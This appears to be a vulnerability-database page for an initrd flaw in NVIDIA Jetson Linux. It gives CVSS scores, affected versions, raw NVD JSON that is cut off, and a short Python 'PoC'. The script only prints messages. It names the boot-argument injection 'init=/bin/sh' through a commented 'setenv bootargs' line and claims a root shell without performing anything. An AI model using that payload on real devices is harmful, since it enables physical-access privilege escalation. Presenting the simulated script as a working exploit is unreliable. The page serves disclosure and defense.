Security Vulnerability Report
CVE-2026-24154 CVSS 7.6 HIGH

CVE-2026-24154

Published: 2026-03-31 17:16:31
Last Modified: 2026-04-03 19:04:33

Description

NVIDIA Jetson Linux has a vulnerability in initrd, where an unprivileged attacker with physical access could inject incorrect command line arguments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, data tampering, and information disclosure.

CVSS Details

CVSS Score: 7.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:nvidia:jetson_linux:*:*:*:*:*:*:*:* (versions before 35.6.4) - VULNERABLE
cpe:2.3:o:nvidia:jetson_linux:*:*:*:*:*:*:*:* (versions from 36.0 up to, but not including, 36.5) - VULNERABLE
cpe:2.3:o:nvidia:jetson_linux:38.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:nvidia:jetson_agx_orin_32gb:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:nvidia:jetson_agx_orin_64gb:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:nvidia:jetson_agx_orin_developer_kit:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:nvidia:jetson_agx_orin_industrial:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:nvidia:jetson_agx_thor_developer_kit:-:*:*:*:*:*:*:* - NOT VULNERABLE
NVIDIA Jetson Linux (for specific versions, refer to NVIDIA Security Bulletin 5797)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2026-24154: NVIDIA Jetson Linux initrd Command Injection
This script demonstrates the concept of injecting malicious arguments.
Note: Physical access to the device serial console is required.
"""
import sys

def simulate_exploit():
    # Malicious argument intended to break initrd execution or gain root shell
    # Example: 'init=/bin/sh' drops to a shell before the real init runs
    malicious_payload = "init=/bin/sh"

    print(f"[+] Attacker gains physical access to serial console.")
    print(f"[*] Interrupting boot process (U-Boot/Bootloader)...")
    print(f"[*] Injecting malicious argument into boot args: {malicious_payload}")

    # Hypothetical command to set the environment variable in bootloader
    # setenv bootargs 'console=ttyS0,115200n8 ... init=/bin/sh'

    print(f"[+] Resuming boot with modified parameters.")
    print(f"[!] Exploit successful: Root shell access granted via initrd override.")

if __name__ == "__main__":
    simulate_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24154", "sourceIdentifier": "[email protected]", "published": "2026-03-31T17:16:30.680", "lastModified": "2026-04-03T19:04:33.083", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Jetson Linux has vulnerability in initrd, where an unprivileged attacker with physical access coul inject incorrect command line arguments. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, data tampering, and information disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:nvidia:jetson_linux:*:*:*:*:*:*:*:*", "versionEndExcluding": "35.6.4", "matchCriteriaId": "B73BF007-6D88-4803-B94B-647CCEC5E291"}, {"vulnerable": true, "criteria": "cpe:2.3:o:nvidia:jetson_linux:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "36.0", "versionEndExcluding": "36.5", "matchCriteriaId": "23FF116C-64BD-4F4D-960F-92A289CB8150"}, {"vulnerable": true, "criteria": "cpe:2.3:o:nvidia:jetson_linux:38.2:*:*:*:*:*:*:*", "matchCriteriaId": "1FAEFF9B-826E-43AA-A67E-AB89871ED945"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_orin_32gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "D196FDF9-FC0F-4411-826D-5A7416F26159"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_orin_64gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "2392844C-6B11-41EA-A280-3AF1BDB77DC2"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_orin_developer_kit:-:*:*:*:*:*:*:*", "matchCriteriaId": "8A7F9D64-EA34-4309-8B2B-293346BD6D25"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_orin_industrial:-:*:*:*:*:*:*:*", "matchCriteriaId": "211E860F-BEFF-4407-967B-3C1332268D8E"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_thor_developer_kit:-:*:*:*:*:*:*:*", "matchCriteriaId": "CFEAFC57-D875-43A7-806F-6F4F07F473C8"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_xavier_32gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "4F92D471-8E65-41FC-A5DE-255136F6F989"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_xavier_64gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "B51F666B-F3ED-4CF3-B48E-B39BDE1C2579"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_agx_xavier_industrial:-:*:*:*:*:*:*:*", "matchCriteriaId": "3C7C6B22-EBD3-4465-9852-4A4844AA714A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_orin_nano_4gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "80DA8F1E-9ED6-476A-9C9F-3DC231E5142D"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_orin_nano_8gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "DD549248-1C2C-4A0C-9822-691F3D77AEB1"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_orin_nano_super_developer_kit:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"6F4ECB54-9725-4BFA-A9E7-2F24EAE5BDAB"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_orin_nx_16gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "6D96D5C9-4F9F-4487-90B9-0D8D473D4C6B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_orin_nx_8gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "E3CF8EB6-767C-43F8-A327-A2D4A91A7CF1"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_t4000:-:*:*:*:*:*:*:*", "matchCriteriaId": "6DDF9FD4-4FE1-4523-BDD6-BEF82B4FFD73"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_t5000:-:*:*:*:*:*:*:*", "matchCriteriaId": "ADCF7D93-C341-4ED4-86CC-2BB7FF31F620"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_xavier_nx_16gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "A36028A3-EE83-4158-9039-5C6C795FA048"}, {"vulnerable": false, "criteria": "cpe:2.3:h:nvidia:jetson_xavier_nx_8gb:-:*:*:*:*:*:*:*", "matchCriteriaId": "22852BE0-B587-48B4-A7B6-6496715C32EF"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24154", "source": "psirt@nvidi ... (truncated)